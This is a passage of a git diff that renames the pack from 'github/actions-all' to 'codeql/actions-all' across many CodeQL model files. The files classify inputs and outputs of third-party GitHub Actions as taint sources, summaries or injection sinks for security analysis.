35aecbdd9681..b16fa3c545b8 100644 --- a/ql/lib/ext/manual/mikefarah_yq.model.yml +++ b/ql/lib/ext/manual/mikefarah_yq.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["mikefarah/yq", "*", "input.cmd", "code-injection", "manual"] diff --git a/ql/lib/ext/manual/mishakav_pytest-coverage-comment.model.yml b/ql/lib/ext/manual/mishakav_pytest-coverage-comment.model.yml index 59c6e39515e6..09a9673ee896 100644 --- a/ql/lib/ext/manual/mishakav_pytest-coverage-comment.model.yml +++ b/ql/lib/ext/manual/mishakav_pytest-coverage-comment.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["mishakav/pytest-coverage-comment", "*", "input.multiple-files", "output.summaryReport", "taint", "manual"] diff --git a/ql/lib/ext/manual/mr-smithers-excellent_docker-build-push.model.yml b/ql/lib/ext/manual/mr-smithers-excellent_docker-build-push.model.yml index 06371eebae21..d3b34019844a 100644 --- a/ql/lib/ext/manual/mr-smithers-excellent_docker-build-push.model.yml +++ b/ql/lib/ext/manual/mr-smithers-excellent_docker-build-push.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["mr-smithers-excellent/docker-build-push", "*", "input.tags", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/msys2_setup-msys2.model.yml b/ql/lib/ext/manual/msys2_setup-msys2.model.yml index a12a478d9bd9..59cf5d2cf025 100644 --- a/ql/lib/ext/manual/msys2_setup-msys2.model.yml +++ b/ql/lib/ext/manual/msys2_setup-msys2.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["msys2/setup-msys2", "*", "input.install", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/mxschmitt_action-tmate.model.yml b/ql/lib/ext/manual/mxschmitt_action-tmate.model.yml index 28357d5f4689..4664937e6bc4 100644 --- a/ql/lib/ext/manual/mxschmitt_action-tmate.model.yml +++ b/ql/lib/ext/manual/mxschmitt_action-tmate.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["mxschmitt/action-tmate", "*", "input.tmate-server-rsa-fingerprint", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/mymindstorm_setup-emsdk.model.yml b/ql/lib/ext/manual/mymindstorm_setup-emsdk.model.yml index cfdff1898aee..28dd99378bf5 100644 --- a/ql/lib/ext/manual/mymindstorm_setup-emsdk.model.yml +++ b/ql/lib/ext/manual/mymindstorm_setup-emsdk.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["mymindstorm/setup-emsdk", "*", "input.actions-cache-folder", "env.EMSDK", "taint", "manual"] - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["mymindstorm/setup-emsdk", "*", "input.actions-cache-folder", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/nanasess_setup-chromedriver.model.yml b/ql/lib/ext/manual/nanasess_setup-chromedriver.model.yml index f4ad5f7292b4..7ca3034593bf 100644 --- a/ql/lib/ext/manual/nanasess_setup-chromedriver.model.yml +++ b/ql/lib/ext/manual/nanasess_setup-chromedriver.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["nanasess/setup-chromedriver", "*", "input.chromedriver-version", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/nanasess_setup-php.model.yml b/ql/lib/ext/manual/nanasess_setup-php.model.yml index 872b4e243d71..8af1107d6864 100644 --- a/ql/lib/ext/manual/nanasess_setup-php.model.yml +++ b/ql/lib/ext/manual/nanasess_setup-php.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["nanasess/setup-php", "*", "input.php-version", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/nick-fields_retry.model.yml b/ql/lib/ext/manual/nick-fields_retry.model.yml index bd53ab3d65a2..86c0bb7ccfb9 100644 --- a/ql/lib/ext/manual/nick-fields_retry.model.yml +++ b/ql/lib/ext/manual/nick-fields_retry.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["nick-fields/retry", "*", "input.on_retry_command", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/octokit_graphql-action.model.yml b/ql/lib/ext/manual/octokit_graphql-action.model.yml index db650eeb7c76..df140b9e570a 100644 --- a/ql/lib/ext/manual/octokit_graphql-action.model.yml +++ b/ql/lib/ext/manual/octokit_graphql-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["octokit/graphql-action", "*", "input.query", "request-forgery", "manual"] diff --git a/ql/lib/ext/manual/octokit_request-action.model.yml b/ql/lib/ext/manual/octokit_request-action.model.yml index 34d63f31ca86..f0f684aa4caa 100644 --- a/ql/lib/ext/manual/octokit_request-action.model.yml +++ b/ql/lib/ext/manual/octokit_request-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["octokit/request-action", "*", "input.route", "request-forgery", "manual"] diff --git a/ql/lib/ext/manual/olafurpg_setup-scala.model.yml b/ql/lib/ext/manual/olafurpg_setup-scala.model.yml index 02d6d804699a..8149f79fa641 100644 --- a/ql/lib/ext/manual/olafurpg_setup-scala.model.yml +++ b/ql/lib/ext/manual/olafurpg_setup-scala.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["olafurpg/setup-scala", "*", "input.jabba-version", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/paambaati_codeclimate-action.model.yml b/ql/lib/ext/manual/paambaati_codeclimate-action.model.yml index 46fb5fd7dd6d..4f2b95eac61e 100644 --- a/ql/lib/ext/manual/paambaati_codeclimate-action.model.yml +++ b/ql/lib/ext/manual/paambaati_codeclimate-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["paambaati/codeclimate-action", "*", "input.coverageCommand", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/paulschuberth_regex-extract-action.model.yml b/ql/lib/ext/manual/paulschuberth_regex-extract-action.model.yml index d1d930168dc8..8abafc6ae7d0 100644 --- a/ql/lib/ext/manual/paulschuberth_regex-extract-action.model.yml +++ b/ql/lib/ext/manual/paulschuberth_regex-extract-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["paulschuberth/regex-extract-action", "*", "input.haystack", "output.matches", "taint", "manual"] diff --git a/ql/lib/ext/manual/peter-evans_create-pull-request.model.yml b/ql/lib/ext/manual/peter-evans_create-pull-request.model.yml index 0aab8b946328..f0dcfa3ea4ef 100644 --- a/ql/lib/ext/manual/peter-evans_create-pull-request.model.yml +++ b/ql/lib/ext/manual/peter-evans_create-pull-request.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["peter-evans/create-pull-request", "*", "input.branch", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/peter-murray_issue-body-parser-action.model.yml b/ql/lib/ext/manual/peter-murray_issue-body-parser-action.model.yml index 62bb26ba1ff5..2268d00d332a 100644 --- a/ql/lib/ext/manual/peter-murray_issue-body-parser-action.model.yml +++ b/ql/lib/ext/manual/peter-murray_issue-body-parser-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSourceModel data: - ["peter-murray/issue-body-parser-action", "*", "output.*", "text", "manual"] diff --git a/ql/lib/ext/manual/peter-murray_issue-forms-body-parser.model.yml b/ql/lib/ext/manual/peter-murray_issue-forms-body-parser.model.yml index 14bd9a7875ac..ab55b9b62144 100644 --- a/ql/lib/ext/manual/peter-murray_issue-forms-body-parser.model.yml +++ b/ql/lib/ext/manual/peter-murray_issue-forms-body-parser.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSourceModel data: - ["peter-murray/issue-forms-body-parser", "*", "output.payload", "text", "manual"] diff --git a/ql/lib/ext/manual/plasmicapp_plasmic-action.model.yml b/ql/lib/ext/manual/plasmicapp_plasmic-action.model.yml index dfacbbc14f46..1ec53228c169 100644 --- a/ql/lib/ext/manual/plasmicapp_plasmic-action.model.yml +++ b/ql/lib/ext/manual/plasmicapp_plasmic-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["plasmicapp/plasmic-action", "*", "input.project_id", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/potiuk_get-workflow-origin.model.yml b/ql/lib/ext/manual/potiuk_get-workflow-origin.model.yml index 0acee71af263..97564731d2cd 100644 --- a/ql/lib/ext/manual/potiuk_get-workflow-origin.model.yml +++ b/ql/lib/ext/manual/potiuk_get-workflow-origin.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSourceModel data: - ["potiuk/get-workflow-origin", "*", "output.sourceHeadBranch", "branch", "manual"] diff --git a/ql/lib/ext/manual/preactjs_compressed-size-action.model.yml b/ql/lib/ext/manual/preactjs_compressed-size-action.model.yml index b258b619b6c5..b43c13276573 100644 --- a/ql/lib/ext/manual/preactjs_compressed-size-action.model.yml +++ b/ql/lib/ext/manual/preactjs_compressed-size-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["preactjs/compressed-size-action", "*", "input.build-script", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/py-actions_flake8.model.yml b/ql/lib/ext/manual/py-actions_flake8.model.yml index 76b0c1d7d32c..d9edf347c335 100644 --- a/ql/lib/ext/manual/py-actions_flake8.model.yml +++ b/ql/lib/ext/manual/py-actions_flake8.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["py-actions/flake8", "*", "input.flake8-version", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/py-actions_py-dependency-install.model.yml b/ql/lib/ext/manual/py-actions_py-dependency-install.model.yml index 587519e948b5..ce637b1b0c52 100644 --- a/ql/lib/ext/manual/py-actions_py-dependency-install.model.yml +++ b/ql/lib/ext/manual/py-actions_py-dependency-install.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["py-actions/py-dependency-install", "*", "input.path", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/pyo3_maturin-action.model.yml b/ql/lib/ext/manual/pyo3_maturin-action.model.yml index 58cbf9cc7423..95d63525c575 100644 --- a/ql/lib/ext/manual/pyo3_maturin-action.model.yml +++ b/ql/lib/ext/manual/pyo3_maturin-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["pyo3/maturin-action", "*", "input.before-script-linux", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/reactivecircus_android-emulator-runner.model.yml b/ql/lib/ext/manual/reactivecircus_android-emulator-runner.model.yml index cc39018b9b1f..d89f4582f67b 100644 --- a/ql/lib/ext/manual/reactivecircus_android-emulator-runner.model.yml +++ b/ql/lib/ext/manual/reactivecircus_android-emulator-runner.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["reactivecircus/android-emulator-runner", "*", "input.api-level", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/read-file-actions.model.yml b/ql/lib/ext/manual/read-file-actions.model.yml index 3d92eaef263a..27130231df9c 100644 --- a/ql/lib/ext/manual/read-file-actions.model.yml +++ b/ql/lib/ext/manual/read-file-actions.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["juliangruber/read-file-action", "*", "artifact", "output.content", "taint", "manual"] diff --git a/ql/lib/ext/manual/redhat-plumbers-in-action_download-artifact.model.yml b/ql/lib/ext/manual/redhat-plumbers-in-action_download-artifact.model.yml index a0b5bc0dee41..9157cec03dd0 100644 --- a/ql/lib/ext/manual/redhat-plumbers-in-action_download-artifact.model.yml +++ b/ql/lib/ext/manual/redhat-plumbers-in-action_download-artifact.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSourceModel data: - ["redhat-plumbers-in-action/download-artifact", "*", "output.*", "artifact", "manual"] diff --git a/ql/lib/ext/manual/reggionick_s3-deploy.model.yml b/ql/lib/ext/manual/reggionick_s3-deploy.model.yml index 89d91208ad46..359c3b0e2225 100644 --- a/ql/lib/ext/manual/reggionick_s3-deploy.model.yml +++ b/ql/lib/ext/manual/reggionick_s3-deploy.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["reggionick/s3-deploy", "*", "input.bucket", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/release-kit_regex.model.yml b/ql/lib/ext/manual/release-kit_regex.model.yml index 5b2e5d9c4eb5..8534ccc599a3 100644 --- a/ql/lib/ext/manual/release-kit_regex.model.yml +++ b/ql/lib/ext/manual/release-kit_regex.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["release-kit/regex", "*", "input.string", "output.*", "taint", "manual"] diff --git a/ql/lib/ext/manual/renovatebot_github-action.model.yml b/ql/lib/ext/manual/renovatebot_github-action.model.yml index 65a4cc606528..136e4aa9e418 100644 --- a/ql/lib/ext/manual/renovatebot_github-action.model.yml +++ b/ql/lib/ext/manual/renovatebot_github-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["renovatebot/github-action", "*", "input.renovate-image", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/rishabh510_path-lister-action.model.yml b/ql/lib/ext/manual/rishabh510_path-lister-action.model.yml index 281602cf0c73..428115a7bd71 100644 --- a/ql/lib/ext/manual/rishabh510_path-lister-action.model.yml +++ b/ql/lib/ext/manual/rishabh510_path-lister-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSourceModel data: # https://github.com/Rishabh510/Path-lister-action diff --git a/ql/lib/ext/manual/roots_issue-closer-action.model.yml b/ql/lib/ext/manual/roots_issue-closer-action.model.yml index d82962aa0969..be313c017115 100644 --- a/ql/lib/ext/manual/roots_issue-closer-action.model.yml +++ b/ql/lib/ext/manual/roots_issue-closer-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["roots/issue-closer-action", "*", "input.issue-close-message", "code-injection", "manual"] diff --git a/ql/lib/ext/manual/ros-tooling_setup-ros.model.yml b/ql/lib/ext/manual/ros-tooling_setup-ros.model.yml index 32622271d6a3..74e55a9bf4e2 100644 --- a/ql/lib/ext/manual/ros-tooling_setup-ros.model.yml +++ b/ql/lib/ext/manual/ros-tooling_setup-ros.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["ros-tooling/setup-ros", "*", "input.required-ros-distributions", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/ruby_setup-ruby.model.yml b/ql/lib/ext/manual/ruby_setup-ruby.model.yml index 8dbc5ee2aded..785616390b39 100644 --- a/ql/lib/ext/manual/ruby_setup-ruby.model.yml +++ b/ql/lib/ext/manual/ruby_setup-ruby.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["ruby/setup-ruby", "*", "input.ruby-version", "output.ruby-prefix", "taint", "manual"] - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["ruby/setup-ruby", "*", "input.ruby-version", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/salsify_action-detect-and-tag-new-version.model.yml b/ql/lib/ext/manual/salsify_action-detect-and-tag-new-version.model.yml index 0bbd6364b5e0..06de2990adf6 100644 --- a/ql/lib/ext/manual/salsify_action-detect-and-tag-new-version.model.yml +++ b/ql/lib/ext/manual/salsify_action-detect-and-tag-new-version.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["salsify/action-detect-and-tag-new-version", "*", "input.tag-template", "output.tag", "taint", "manual"] - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["salsify/action-detect-and-tag-new-version", "*", "input.version-command", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/sergeysova_jq-action.model.yml b/ql/lib/ext/manual/sergeysova_jq-action.model.yml index 6d6ec4a393e5..a2ca3eae7844 100644 --- a/ql/lib/ext/manual/sergeysova_jq-action.model.yml +++ b/ql/lib/ext/manual/sergeysova_jq-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["sergeysova/jq-action", "*", "input.cmd", "code-injection", "manual"] diff --git a/ql/lib/ext/manual/shallwefootball_upload-s3-action.model.yml b/ql/lib/ext/manual/shallwefootball_upload-s3-action.model.yml index 78737c6bb8bd..962c7431b758 100644 --- a/ql/lib/ext/manual/shallwefootball_upload-s3-action.model.yml +++ b/ql/lib/ext/manual/shallwefootball_upload-s3-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["shallwefootball/upload-s3-action", "*", "input.destination_dir", "output.object_key", "taint", "manual"] diff --git a/ql/lib/ext/manual/shogo82148_actions-setup-perl.model.yml b/ql/lib/ext/manual/shogo82148_actions-setup-perl.model.yml index 64d5aac33ab8..ebe62b37a6fd 100644 --- a/ql/lib/ext/manual/shogo82148_actions-setup-perl.model.yml +++ b/ql/lib/ext/manual/shogo82148_actions-setup-perl.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["shogo82148/actions-setup-perl", "*", "input.working-directory", "env.PERL5LIB", "taint", "manual"] diff --git a/ql/lib/ext/manual/skitionek_notify-microsoft-teams.model.yml b/ql/lib/ext/manual/skitionek_notify-microsoft-teams.model.yml index c921df3fa7d0..64d8ec1b7a58 100644 --- a/ql/lib/ext/manual/skitionek_notify-microsoft-teams.model.yml +++ b/ql/lib/ext/manual/skitionek_notify-microsoft-teams.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["skitionek/notify-microsoft-teams", "*", "input.overwrite", "code-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/manual/snow-actions_eclint.model.yml b/ql/lib/ext/manual/snow-actions_eclint.model.yml index 623483db63ec..49ba12d47a24 100644 --- a/ql/lib/ext/manual/snow-actions_eclint.model.yml +++ b/ql/lib/ext/manual/snow-actions_eclint.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["snow-actions/eclint", "*", "input.args", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/stackhawk_hawkscan-action.model.yml b/ql/lib/ext/manual/stackhawk_hawkscan-action.model.yml index 5184c3c4c48c..396c480c4cdc 100644 --- a/ql/lib/ext/manual/stackhawk_hawkscan-action.model.yml +++ b/ql/lib/ext/manual/stackhawk_hawkscan-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["stackhawk/hawkscan-action", "*", "input.workspace", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/step-security_harden-runner.model.yml b/ql/lib/ext/manual/step-security_harden-runner.model.yml index c898d41c8387..129c8beb0202 100644 --- a/ql/lib/ext/manual/step-security_harden-runner.model.yml +++ b/ql/lib/ext/manual/step-security_harden-runner.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["step-security/harden-runner", "*", "input.allowed-endpoints", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/suisei-cn_actions-download-file.model.yml b/ql/lib/ext/manual/suisei-cn_actions-download-file.model.yml index d7c874c77870..343c0efe42aa 100644 --- a/ql/lib/ext/manual/suisei-cn_actions-download-file.model.yml +++ b/ql/lib/ext/manual/suisei-cn_actions-download-file.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["suisei-cn/actions-download-file", "*", "input.filename", "output.filename", "taint", "manual"] diff --git a/ql/lib/ext/manual/the-coding-turtle_ga-file-list.model.yml b/ql/lib/ext/manual/the-coding-turtle_ga-file-list.model.yml index 7daafbc2fd81..6ca3eb0c1607 100644 --- a/ql/lib/ext/manual/the-coding-turtle_ga-file-list.model.yml +++ b/ql/lib/ext/manual/the-coding-turtle_ga-file-list.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSourceModel data: # https://github.com/the-coding-turtle/ga-file-list diff --git a/ql/lib/ext/manual/tibdex_backport.model.yml b/ql/lib/ext/manual/tibdex_backport.model.yml index 398dfb5c766c..956c9afc8e40 100644 --- a/ql/lib/ext/manual/tibdex_backport.model.yml +++ b/ql/lib/ext/manual/tibdex_backport.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["tibdex/backport", "*", "input.body_template", "code-injection", "manual"] diff --git a/ql/lib/ext/manual/tim-actions_get-pr-commits.model.yml b/ql/lib/ext/manual/tim-actions_get-pr-commits.model.yml index a0dfb648875e..e49643d1f155 100644 --- a/ql/lib/ext/manual/tim-actions_get-pr-commits.model.yml +++ b/ql/lib/ext/manual/tim-actions_get-pr-commits.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSourceModel data: - ["tim-actions/get-pr-commits", "*", "output.commits", "text", "manual"] diff --git a/ql/lib/ext/manual/timheuer_base64-to-file.model.yml b/ql/lib/ext/manual/timheuer_base64-to-file.model.yml index 872964f8215f..c9b65a303798 100644 --- a/ql/lib/ext/manual/timheuer_base64-to-file.model.yml +++ b/ql/lib/ext/manual/timheuer_base64-to-file.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["timheuer/base64-to-file", "*", "input.fileName", "output.filePath", "taint", "manual"] diff --git a/ql/lib/ext/manual/tj-actions_branch-names.model.yml b/ql/lib/ext/manual/tj-actions_branch-names.model.yml index 56f017635ce9..386142a2d128 100644 --- a/ql/lib/ext/manual/tj-actions_branch-names.model.yml +++ b/ql/lib/ext/manual/tj-actions_branch-names.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSourceModel data: # https://github.com/tj-actions/branch-names diff --git a/ql/lib/ext/manual/tmelliottjr_extract-regex-action.model.yml b/ql/lib/ext/manual/tmelliottjr_extract-regex-action.model.yml index 73fd66c11b9d..3cfedbdec2c8 100644 --- a/ql/lib/ext/manual/tmelliottjr_extract-regex-action.model.yml +++ b/ql/lib/ext/manual/tmelliottjr_extract-regex-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["tmelliottjr/extract-regex-action", "*", "input.input", "output.resultString", "taint", "manual"] diff --git a/ql/lib/ext/manual/trilom_file-changes-action.model.yml b/ql/lib/ext/manual/trilom_file-changes-action.model.yml index 79a12582e9e4..9d5b8b88ce2f 100644 --- a/ql/lib/ext/manual/trilom_file-changes-action.model.yml +++ b/ql/lib/ext/manual/trilom_file-changes-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSourceModel data: - ["trilom/file-changes-action", "*", "output.files", "filename", "manual"] diff --git a/ql/lib/ext/manual/tripss_conventional-changelog-action.model.yml b/ql/lib/ext/manual/tripss_conventional-changelog-action.model.yml index a534e3dfcf75..3893986830a0 100644 --- a/ql/lib/ext/manual/tripss_conventional-changelog-action.model.yml +++ b/ql/lib/ext/manual/tripss_conventional-changelog-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["tripss/conventional-changelog-action", "*", "input.pre-release-identifier", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/tryghost_action-deploy-theme.model.yml b/ql/lib/ext/manual/tryghost_action-deploy-theme.model.yml index dfaa2e2687db..f2f99cc744a0 100644 --- a/ql/lib/ext/manual/tryghost_action-deploy-theme.model.yml +++ b/ql/lib/ext/manual/tryghost_action-deploy-theme.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["tryghost/action-deploy-theme", "*", "input.theme-name", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/tzkhan_pr-update-action.model.yml b/ql/lib/ext/manual/tzkhan_pr-update-action.model.yml index f87beb15018c..5a226f121032 100644 --- a/ql/lib/ext/manual/tzkhan_pr-update-action.model.yml +++ b/ql/lib/ext/manual/tzkhan_pr-update-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSourceModel data: - ["tzkhan/pr-update-action", "*", "output.headMatch", "branch", "manual"] diff --git a/ql/lib/ext/manual/veracode_veracode-sca.model.yml b/ql/lib/ext/manual/veracode_veracode-sca.model.yml index 59cc155b5507..d3e1daae67ac 100644 --- a/ql/lib/ext/manual/veracode_veracode-sca.model.yml +++ b/ql/lib/ext/manual/veracode_veracode-sca.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["veracode/veracode-sca", "*", "input.url", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/w3f_action-find-old-files.model.yml b/ql/lib/ext/manual/w3f_action-find-old-files.model.yml index 38d892966d4a..91a9ad11aa6d 100644 --- a/ql/lib/ext/manual/w3f_action-find-old-files.model.yml +++ b/ql/lib/ext/manual/w3f_action-find-old-files.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSourceModel data: # https://github.com/w3f/action-find-old-files diff --git a/ql/lib/ext/manual/wearerequired_lint-action.model.yml b/ql/lib/ext/manual/wearerequired_lint-action.model.yml index 52dcff39903b..b1f8b91a22de 100644 --- a/ql/lib/ext/manual/wearerequired_lint-action.model.yml +++ b/ql/lib/ext/manual/wearerequired_lint-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["wearerequired/lint-action", "*", "input.git_name", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/webfactory_ssh-agent.model.yml b/ql/lib/ext/manual/webfactory_ssh-agent.model.yml index f9e122c17a9c..48b11c1c5b20 100644 --- a/ql/lib/ext/manual/webfactory_ssh-agent.model.yml +++ b/ql/lib/ext/manual/webfactory_ssh-agent.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["webfactory/ssh-agent", "*", "input.ssh-agent-cmd", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/xom9ikk_dotenv.model.yml b/ql/lib/ext/manual/xom9ikk_dotenv.model.yml index bfbd4e2f7294..1ed8c0fd3f7c 100644 --- a/ql/lib/ext/manual/xom9ikk_dotenv.model.yml +++ b/ql/lib/ext/manual/xom9ikk_dotenv.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["xom9ikk/dotenv", "*", "artifact", "envvar-injection", "manual"] diff --git a/ql/lib/ext/manual/xt0rted_pull-request-comment-branch.model.yml b/ql/lib/ext/manual/xt0rted_pull-request-comment-branch.model.yml index e4b34c37d70b..bfbd1dd12e6e 100644 --- a/ql/lib/ext/manual/xt0rted_pull-request-comment-branch.model.yml +++ b/ql/lib/ext/manual/xt0rted_pull-request-comment-branch.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSourceModel data: - ["xt0rted/pull-request-comment-branch", "*", "output.head_ref", "branch", "manual"] diff --git a/ql/lib/ext/manual/yumemi-inc_changed-files.model.yml 